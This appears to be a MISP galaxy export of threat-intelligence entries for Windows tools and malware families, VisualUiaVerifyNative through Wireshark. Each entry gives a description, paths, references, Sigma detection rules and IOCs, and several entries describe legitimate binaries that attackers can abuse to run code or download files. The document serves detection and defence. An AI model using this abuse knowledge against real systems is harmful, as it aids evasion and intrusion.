| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5071 |
| source | Tidal Cyber |
| tags | ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
VisualUiaVerifyNative
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Resources: * https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ * https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_visualuiaverifynative.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[VisualUiaVerifyNative.exe - LOLBAS Project]
Internal MISP references
UUID acfbcd12-25fd-41cd-83ef-c7af7cb59fff which can be used as unique global reference for VisualUiaVerifyNative in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5246 |
| source | Tidal Cyber |
| tags | ['5e096dac-47b7-4657-a57b-752ef7da0263', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Volgmer
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. [US-CERT Volgmer Nov 2017]
Internal MISP references
UUID 7fcfba45-5752-4f0c-8023-db67729ae34e which can be used as unique global reference for Volgmer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0180 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
VSDiagnostics
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command-line tool used for performing diagnostics.
Author: Bobby Cooke
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Resources: * https://twitter.com/0xBoku/status/1679200664013135872
Detection: * Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml[VSDiagnostics.exe - LOLBAS Project]
Internal MISP references
UUID fca6d378-bbe6-4418-b238-6a9a63aaabba which can be used as unique global reference for VSDiagnostics in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5244 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Vshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
Author: Ayberk Halaç
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe
Resources: * https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample
Detection: * IOC: vshadow.exe usage with -exec parameter[Vshadow.exe - LOLBAS Project]
Internal MISP references
UUID f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2 which can be used as unique global reference for Vshadow in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5247 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
VSIISExeLauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: timwhite
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe
Resources: * https://github.com/timwhitez
Detection: * Sigma: proc_creation_win_lolbin_vsiisexelauncher.yml * IOC: VSIISExeLauncher.exe spawned an unknown process[VSIISExeLauncher.exe - LOLBAS Project]
Internal MISP references
UUID 2517da5a-11b1-4f77-b488-c096173b1b50 which can be used as unique global reference for VSIISExeLauncher in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5245 |
| source | Tidal Cyber |
| tags | ['0bf195a2-c577-4317-973e-a72dde5a06e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
vsjitdebugger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: Oddvar Moe
Paths: * c:\windows\system32\vsjitdebugger.exe
Resources: * https://twitter.com/pabraeken/status/990758590020452353
Detection: * Sigma: proc_creation_win_susp_use_of_vsjitdebugger_bin.yml[vsjitdebugger.exe - LOLBAS Project]
Internal MISP references
UUID 34ba500e-c37c-45ec-abf4-16e2f76d82c8 which can be used as unique global reference for vsjitdebugger in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5248 |
| source | Tidal Cyber |
| tags | ['71bc284c-bfce-4191-80e0-ef70ff4315bf', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
vsls-agent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Resources: * https://twitter.com/bohops/status/1583916360404729857
Detection: * Sigma: proc_creation_win_vslsagent_agentextensionpath_load.yml[vsls-agent.exe - LOLBAS Project]
Internal MISP references
UUID 99f752db-12c4-45a7-9f7b-f4fcda033462 which can be used as unique global reference for vsls-agent in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5253 |
| source | Tidal Cyber |
| tags | ['375cb8ad-2b6a-49b7-8eb3-757aaaf72d8b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
vstest.console
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSTest.Console.exe is the command-line tool to run tests
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
Resources: * https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022
Detection: * IOC: vstest.console.exe spawning unexpected processes[vstest.console.exe - LOLBAS Project]
Internal MISP references
UUID dfbe173f-5c36-4596-aefb-7ccf504e03c8 which can be used as unique global reference for vstest.console in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5254 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Wab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows address book manager
Author: Oddvar Moe
Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe
Resources: * https://twitter.com/Hexacorn/status/991447379864932352 * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Detection: * Sigma: registry_set_wab_dllpath_reg_change.yml * IOC: WAB.exe should normally never be used[Wab.exe - LOLBAS Project]
Internal MISP references
UUID 6cbd62e8-9024-42d7-93d5-6b8b3409425b which can be used as unique global reference for Wab in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5173 |
| source | Tidal Cyber |
| tags | ['a53c9f4b-6f0d-4afa-b1ac-8e2d91279210', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
WannaCry
WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[LogRhythm WannaCry][US-CERT WannaCry 2017][Washington Post WannaCry 2017][FireEye WannaCry 2017]
Internal MISP references
UUID 6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a which can be used as unique global reference for WannaCry in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0366 |
| source | MITRE |
| tags | ['45795633-a32b-4d9e-8620-4044ac056647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WarzoneRAT
WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[Check Point Warzone Feb 2020][Uptycs Warzone UAC Bypass November 2020]
Internal MISP references
UUID cfebe868-15cb-4be5-b7ed-38b52f2a0722 which can be used as unique global reference for WarzoneRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0670 |
| source | MITRE |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WastedLocker
WastedLocker is a ransomware family attributed to Indrik Spider that has been used since at least May 2020. WastedLocker has been used against a broad variety of sectors, including manufacturing, information technology, and media.[Symantec WastedLocker June 2020][NCC Group WastedLocker June 2020][Sentinel Labs WastedLocker July 2020]
Internal MISP references
UUID 0ba6ee8d-2b29-4980-8e55-348ea05f00ad which can be used as unique global reference for WastedLocker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0612 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Waterbear
Waterbear is modular malware attributed to BlackTech that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.[Trend Micro Waterbear December 2019]
Internal MISP references
UUID 56872a5b-dc01-455c-85d5-06c577abb030 which can be used as unique global reference for Waterbear in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0579 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WEBC2
WEBC2 is a family of backdoor malware used by APT1 as early as July 2006. WEBC2 backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. [Mandiant APT1 Appendix][Mandiant APT1]
Internal MISP references
UUID f228af8f-8938-4836-9461-c6ca220ed7c5 which can be used as unique global reference for WEBC2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0109 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMail
WellMail is a lightweight malware written in Golang used by APT29, similar in design and structure to WellMess.[CISA WellMail July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID b936a1b3-5493-4d6c-9b69-29addeace418 which can be used as unique global reference for WellMail in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0515 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMess
WellMess is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by APT29.[CISA WellMess July 2020][PWC WellMess July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID 20725ec7-ee35-44cf-bed6-91158aa03ce4 which can be used as unique global reference for WellMess in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0514 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wevtutil
Wevtutil is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.[Wevtutil Microsoft Documentation]
Internal MISP references
UUID 2bcbcea6-192a-4501-aab1-1edde53875fa which can be used as unique global reference for Wevtutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0645 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '5db11c6f-cba4-4865-b993-7a3aafd0f037', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wfc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_wfc.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Wfc.exe - LOLBAS Project]
Internal MISP references
UUID dadd1243-6a4a-4ce2-9eea-1c530e7510d9 which can be used as unique global reference for Wfc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5249 |
| source | Tidal Cyber |
| tags | ['be621f15-1788-490f-b8bb-85511a5a8074', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
WhisperGate
WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[Cybereason WhisperGate February 2022][Unit 42 WhisperGate January 2022][Microsoft WhisperGate January 2022]
Internal MISP references
UUID 791f0afd-c2c4-4e23-8aee-1d14462667f5 which can be used as unique global reference for WhisperGate in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0689 |
| source | MITRE |
| tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wiarp
Wiarp is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Wiarp May 2012]
Internal MISP references
UUID 7b393608-c141-48af-ae3d-3eff13c3e01c which can be used as unique global reference for Wiarp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0206 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Windows Credential Editor
Windows Credential Editor is a password dumping tool. [Amplia WCE]
Internal MISP references
UUID 7c2c44d7-b307-4e13-b181-52352975a6f5 which can be used as unique global reference for Windows Credential Editor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0005 |
| source | MITRE |
| tags | ['1d306cbd-9894-4322-a233-b1576b8e25ba'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
WINDSHIELD
WINDSHIELD is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID ed50dcf7-e283-451e-95b1-a8485f8dd214 which can be used as unique global reference for WINDSHIELD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0155 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WindTail
WindTail is a macOS surveillance implant used by Windshift. WindTail shares code similarities with Hack Back aka KitM OSX.[SANS Windshift August 2018][objective-see windtail1 dec 2018][objective-see windtail2 jan 2019]
Internal MISP references
UUID 3afe711d-ed58-4c94-a9b6-9c847e1e8a2f which can be used as unique global reference for WindTail in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0466 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WINERACK
WINERACK is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5f994df7-55b0-4383-8ebc-506d4987292a which can be used as unique global reference for WINERACK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0219 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winexe
Winexe is a lightweight, open source tool similar to PsExec designed to allow system administrators to execute commands on remote servers. [Winexe Github Sept 2013] Winexe is unique in that it is a GNU/Linux based client. [Überwachung APT28 Forfiles June 2015]
Internal MISP references
UUID 65d5b524-0e84-417d-9884-e2c501abfacd which can be used as unique global reference for Winexe in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0191 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wingbird
Wingbird is a backdoor that appears to be a version of commercial software FinFisher. It is reportedly used to attack individual computers instead of networks. It was used by NEODYMIUM in a May 2016 campaign. [Microsoft SIR Vol 21] [Microsoft NEODYMIUM Dec 2016]
Internal MISP references
UUID 3e70078f-407e-4b03-b604-bdc05b372f37 which can be used as unique global reference for Wingbird in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0176 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
winget
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Package Manager tool
Author: Paul Sanders
Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe
Resources: * https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended
Detection: * IOC: winget.exe spawned with local manifest file * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * Sigma: proc_creation_win_winget_local_install_via_manifest.yml[winget.exe - LOLBAS Project]
Internal MISP references
UUID 6c4e7a00-0151-490c-8a41-98981d355725 which can be used as unique global reference for winget in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5174 |
| source | Tidal Cyber |
| tags | ['61f778ca-b2f1-4877-b0f5-fd5e87b6ddab', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
WinMM
WinMM is a full-featured, simple backdoor used by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID e10423c2-71a7-4878-96ba-343191136c19 which can be used as unique global reference for WinMM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0059 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Linux
Winnti for Linux is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including Winnti Group. The Windows variant is tracked separately under Winnti for Windows.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID e384e711-0796-4cbc-8854-8c3f939faf57 which can be used as unique global reference for Winnti for Linux in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0430 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Windows
Winnti for Windows is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, Winnti Group.[Kaspersky Winnti April 2013][Microsoft Winnti Jan 2017][Novetta Winnti April 2015][401 TRG Winnti Umbrella May 2018]. The Linux variant is tracked separately under Winnti for Linux.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID 245c216e-41c3-4dec-8b23-bfc7c6a46d6e which can be used as unique global reference for Winnti for Windows in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0141 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
WinRAR
According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.[WinRAR Website] It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID d9792748-b81a-4d82-a45e-de05c2a23dbf which can be used as unique global reference for WinRAR in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5081 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '23d0545e-45fa-4f0a-957e-deb923039c80'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
winrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script used for manage Windows RM settings
Author: Oddvar Moe
Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs
Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * https://github.com/enigma0x3/windows-operating-system-archaeology * https://redcanary.com/blog/lateral-movement-winrm-wmi/ * https://twitter.com/bohops/status/994405551751815170 * https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 * https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Detection: * Sigma: proc_creation_win_winrm_awl_bypass.yml * Sigma: proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml * Sigma: file_event_win_winrm_awl_bypass.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[winrm.vbs - LOLBAS Project]
Internal MISP references
UUID 8807e10c-dc1b-4dab-8f60-c03a85c18873 which can be used as unique global reference for winrm in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5263 |
| source | Tidal Cyber |
| tags | ['2eecd309-e75d-4f7b-8f6f-e11213f48b12', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
WinSCP
WinSCP is a tool used to facilitate file transfer using Secure Shell (SSH) File Transfer Protocol (FTP) for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3ded75ea-b253-48cd-94e7-aef53e0d1e31 which can be used as unique global reference for WinSCP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5046 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Winword
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files\Microsoft Office\root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office\Office16\winword.exe * C:\Program Files\Microsoft Office\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office\Office15\winword.exe * C:\Program Files\Microsoft Office\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office14\winword.exe * C:\Program Files\Microsoft Office\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_office_arbitrary_cli_download.yml * IOC: Suspicious Office application Internet/network traffic[Winword.exe - LOLBAS Project]
Internal MISP references
UUID 7adaeb79-087f-4d65-8f8f-d4689755b107 which can be used as unique global reference for Winword in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5250 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '228354f0-c709-4a16-a489-c5098ae06c17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wiper
Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [Dell Wiper]
Internal MISP references
UUID 627e05c2-c02e-433e-9288-c2d78bce156f which can be used as unique global reference for Wiper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0041 |
| source | MITRE |
| tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
Wireshark
Wireshark is a popular open-source packet analyzer utility.
Internal MISP references
UUID 804da3b9-9c3a-4937-aa4a-efddfa5c176e which can be used as unique global reference for Wireshark in MISP communities and other software using the MISP galaxy
